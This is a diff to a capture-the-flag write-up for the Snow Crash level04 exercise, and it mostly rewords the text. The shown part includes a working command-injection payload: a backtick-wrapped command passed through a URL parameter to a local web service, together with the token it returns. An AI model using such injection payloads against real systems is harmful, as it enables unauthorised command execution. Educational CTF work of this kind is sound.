rertzer/ft_cybersecurity_projects/snow_crash/level04/level04.md

 </VirtualHost>
 ```

-> Notice that there is also an Apache conf file for level12.
+> Notice that there is also an Apache configuration file for level12.

 ## `getflag` over IP

-- As the parameter x is in a shell command executed as `flag04`, we can try a command injection to execute the `getflag` program:
+- As the parameter `x` is injected in a shell command executed as `flag04`, we can try a command injection to execute the `getflag` program:

 ``level04@SnowCrash:~$ curl 'localhost:4747?x=`getflag`'
 Check flag.Here is your token : ne2searoevaevoem4ov4ar8ap``